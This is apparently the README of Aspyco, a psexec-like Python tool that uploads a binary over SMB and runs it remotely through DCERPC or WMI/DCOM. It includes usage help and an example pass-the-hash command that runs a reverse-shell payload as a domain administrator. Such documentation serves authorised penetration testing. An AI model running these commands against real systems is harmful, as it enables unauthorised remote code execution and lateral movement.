Aspyco
Aspyco is a Python script that uploads a local binary to a remote host over SMB.
It then connects remotely to a named pipe over DCERPC, or uses DCOM, to create and execute your payload.
It's a psexec-like tool with custom execution !!
What da fuck is this ?
On Windows, the RPC protocol lets a client call functions on a remote host.
Remotely, you can connect to an SMB named pipe and call those functions over the DCERPC protocol.
That way, you can upload a binary file over SMB and then call functions
that create a service to execute your payload.
You can also execute binaries remotely with WMI over a DCOM connection.
Installation
From source:
git clone https://github.com/ProcessusT/Aspyco
cd Aspyco
python3 aspyco.py -h
Usage
Aspyco uses Impacket syntax:

usage: aspyco.py [-h] [-payload PAYLOAD] [-listener_ip LISTENER_IP] [-listener_port LISTENER_PORT] [-method METHOD] [-hashes LMHASH:NTHASH] target

Upload and start your custom payloads remotely !

positional arguments:
  target                        [[domain/]username[:password]@]<targetName or address>

options:
  -h, --help                    show this help message and exit
  -payload PAYLOAD              Your custom binary file
  -listener_ip LISTENER_IP      Listener ip address if no custom payload is specified
  -listener_port LISTENER_PORT  Listener port if no custom payload is specified
  -method METHOD                {"DCERPC-SVCCTL", "DCERPC-ATSVC", "DCOM"} - Default : DCERPC-SVCCTL
  -hashes LMHASH:NTHASH         NTLM hashes, format is LMHASH:NTHASH
Example
aspyco -hashes :ed0052e5a66b1c8e942cc9481a50d56 DOMAIN.local/administrator@10.0.0.1 -payload custom_reverse_shell.exe
